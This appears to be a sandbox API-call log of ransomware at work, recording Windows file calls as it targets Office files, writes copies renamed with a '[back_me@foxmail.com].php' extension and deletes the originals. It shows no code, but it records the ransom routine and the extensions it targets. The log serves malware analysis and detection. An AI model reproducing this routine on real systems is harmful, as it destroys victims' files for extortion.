lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0251.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.180] lstrlenW (lpString=".1cd") returned 4 [0251.180] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0251.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.180] lstrlenW (lpString=".jpg") returned 4 [0251.180] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0251.180] lstrcmpiW (lpString1=".eftx", lpString2=".php") returned -1 [0251.180] lstrlenW (lpString="Thatch.eftx") returned 11 [0251.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0251.204] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=41295) returned 1 [0251.204] CloseHandle (hObject=0x380) returned 1 [0251.204] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx")) returned 0x20 [0251.204] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0251.205] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.205] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0251.205] GetLastError () returned 0x0 [0251.205] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xa14f, lpOverlapped=0x0) returned 1 [0251.209] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xa150, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xa150, lpOverlapped=0x0) returned 1 [0251.211] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0251.211] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xea, lpOverlapped=0x0) returned 1 [0251.211] SetEndOfFile (hFile=0x3ac) returned 1 [0251.217] CloseHandle (hObject=0x3ac) returned 1 [0251.217] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.217] SetEndOfFile (hFile=0x380) returned 1 [0251.224] CloseHandle (hObject=0x380) returned 1 [0251.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.224] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx")) returned 1 [0251.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.225] lstrlenW (lpString=".doc") returned 4 [0251.225] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0251.225] lstrlenW (lpString=".docx") returned 5 [0251.225] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0251.225] lstrlenW (lpString=".pdf") returned 4 [0251.225] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0251.225] lstrlenW (lpString=".xls") returned 4 [0251.225] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0251.225] lstrlenW (lpString=".xlsx") returned 5 [0251.225] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0251.225] lstrlenW (lpString=".ppt") returned 4 [0251.225] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0251.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.225] lstrlenW (lpString=".zip") returned 4 [0251.225] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0251.225] lstrlenW (lpString=".rar") returned 4 [0251.225] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0251.225] lstrlenW (lpString=".bz2") returned 4 [0251.225] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0251.225] lstrlenW (lpString=".7z") returned 3 [0251.225] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0251.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.225] lstrlenW (lpString=".dbf") returned 4 [0251.226] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.226] lstrlenW (lpString=".1cd") returned 4 [0251.226] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.226] lstrlenW (lpString=".jpg") returned 4 [0251.226] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.226] lstrlenW (lpString=".doc") returned 4 [0251.226] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString=".docx") returned 5 [0251.226] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0251.226] lstrlenW (lpString=".pdf") returned 4 [0251.226] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString=".xls") returned 4 [0251.226] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString=".xlsx") returned 5 [0251.226] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0251.226] lstrlenW (lpString=".ppt") returned 4 [0251.226] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.226] lstrlenW (lpString=".zip") returned 4 [0251.226] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString=".rar") returned 4 [0251.226] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString=".bz2") returned 4 [0251.226] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0251.226] lstrlenW (lpString=".7z") returned 3 [0251.226] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0251.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.227] lstrlenW (lpString=".dbf") returned 4 [0251.227] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0251.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.227] lstrlenW (lpString=".1cd") returned 4 [0251.227] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0251.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0251.227] lstrlenW (lpString=".jpg") returned 4 [0251.227] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0251.227] lstrcmpiW (lpString1=".eftx", lpString2=".php") returned -1 [0251.227] lstrlenW (lpString="Waveform.eftx") returned 13 [0251.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0251.228] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=112504) returned 1 [0251.228] CloseHandle (hObject=0x380) returned 1 [0251.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx")) returned 0x20 [0251.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0251.229] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.229] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0251.229] GetLastError () returned 0x0 [0251.229] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x1b778, lpOverlapped=0x0) returned 1 [0251.233] WriteFile (in: hFile=0x3b4, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x1b780, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x1b780, lpOverlapped=0x0) returned 1 [0251.236] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0251.236] WriteFile (in: hFile=0x3b4, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xee, lpOverlapped=0x0) returned 1 [0251.236] SetEndOfFile (hFile=0x3b4) returned 1 [0251.236] CloseHandle (hObject=0x3b4) returned 1 [0251.236] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.236] SetEndOfFile (hFile=0x380) returned 1 [0251.239] CloseHandle (hObject=0x380) returned 1 [0251.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx")) returned 1 [0251.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.240] lstrlenW (lpString=".doc") returned 4 [0251.240] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0251.240] lstrlenW (lpString=".docx") returned 5 [0251.240] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0251.240] lstrlenW (lpString=".pdf") returned 4 [0251.240] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0251.240] lstrlenW (lpString=".xls") returned 4 [0251.240] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0251.240] lstrlenW (lpString=".xlsx") returned 5 [0251.240] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0251.240] lstrlenW (lpString=".ppt") returned 4 [0251.240] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0251.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.240] lstrlenW (lpString=".zip") returned 4 [0251.240] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0251.240] lstrlenW (lpString=".rar") returned 4 [0251.240] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0251.240] lstrlenW (lpString=".bz2") returned 4 [0251.240] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0251.240] lstrlenW (lpString=".7z") returned 3 [0251.240] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0251.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.241] lstrlenW (lpString=".dbf") returned 4 [0251.241] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0251.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.241] lstrlenW (lpString=".1cd") returned 4 [0251.241] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0251.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.241] lstrlenW (lpString=".jpg") returned 4 [0251.241] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0251.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.241] lstrlenW (lpString=".doc") returned 4 [0251.241] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0251.241] lstrlenW (lpString=".docx") returned 5 [0251.241] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0251.241] lstrlenW (lpString=".pdf") returned 4 [0251.241] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0251.241] lstrlenW (lpString=".xls") returned 4 [0251.241] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0251.241] lstrlenW (lpString=".xlsx") returned 5 [0251.241] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0251.241] lstrlenW (lpString=".ppt") returned 4 [0251.241] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0251.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.241] lstrlenW (lpString=".zip") returned 4 [0251.241] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0251.241] lstrlenW (lpString=".rar") returned 4 [0251.242] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0251.242] lstrlenW (lpString=".bz2") returned 4 [0251.242] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0251.242] lstrlenW (lpString=".7z") returned 3 [0251.242] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0251.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.242] lstrlenW (lpString=".dbf") returned 4 [0251.242] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0251.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.242] lstrlenW (lpString=".1cd") returned 4 [0251.242] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0251.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0251.242] lstrlenW (lpString=".jpg") returned 4 [0251.242] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0251.242] lstrcmpiW (lpString1=".MML", lpString2=".php") returned -1 [0251.242] lstrlenW (lpString="CAGCAT10.MML") returned 12 [0251.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0251.266] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=312400) returned 1 [0251.266] CloseHandle (hObject=0x3b8) returned 1 [0251.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml")) returned 0x20 [0251.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0251.277] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.277] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0251.374] GetLastError () returned 0x0 [0251.375] ReadFile (in: hFile=0x3a8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x4c450, lpOverlapped=0x0) returned 1 [0251.427] WriteFile (in: hFile=0x38c, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x4c460, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x4c460, lpOverlapped=0x0) returned 1 [0251.433] ReadFile (in: hFile=0x3a8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0251.433] WriteFile (in: hFile=0x38c, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0251.434] SetEndOfFile (hFile=0x38c) returned 1 [0251.434] CloseHandle (hObject=0x38c) returned 1 [0251.434] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.434] SetEndOfFile (hFile=0x3a8) returned 1 [0251.585] CloseHandle (hObject=0x3a8) returned 1 [0251.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.598] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml")) returned 1 [0251.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.599] lstrlenW (lpString=".doc") returned 4 [0251.599] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0251.599] lstrlenW (lpString=".docx") returned 5 [0251.599] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0251.599] lstrlenW (lpString=".pdf") returned 4 [0251.599] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0251.599] lstrlenW (lpString=".xls") returned 4 [0251.599] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0251.599] lstrlenW (lpString=".xlsx") returned 5 [0251.599] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0251.599] lstrlenW (lpString=".ppt") returned 4 [0251.599] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0251.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.599] lstrlenW (lpString=".zip") returned 4 [0251.599] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0251.599] lstrlenW (lpString=".rar") returned 4 [0251.599] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0251.599] lstrlenW (lpString=".bz2") returned 4 [0251.599] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0251.599] lstrlenW (lpString=".7z") returned 3 [0251.599] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0251.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.599] lstrlenW (lpString=".dbf") returned 4 [0251.599] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0251.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.600] lstrlenW (lpString=".1cd") returned 4 [0251.600] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0251.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.600] lstrlenW (lpString=".jpg") returned 4 [0251.600] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0251.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.600] lstrlenW (lpString=".doc") returned 4 [0251.600] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0251.600] lstrlenW (lpString=".docx") returned 5 [0251.600] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0251.600] lstrlenW (lpString=".pdf") returned 4 [0251.600] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0251.600] lstrlenW (lpString=".xls") returned 4 [0251.600] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0251.600] lstrlenW (lpString=".xlsx") returned 5 [0251.600] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0251.600] lstrlenW (lpString=".ppt") returned 4 [0251.600] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0251.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.600] lstrlenW (lpString=".zip") returned 4 [0251.600] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0251.600] lstrlenW (lpString=".rar") returned 4 [0251.600] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0251.600] lstrlenW (lpString=".bz2") returned 4 [0251.600] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0251.601] lstrlenW (lpString=".7z") returned 3 [0251.601] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0251.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.601] lstrlenW (lpString=".dbf") returned 4 [0251.601] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0251.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.601] lstrlenW (lpString=".1cd") returned 4 [0251.601] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0251.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0251.601] lstrlenW (lpString=".jpg") returned 4 [0251.601] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0251.601] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 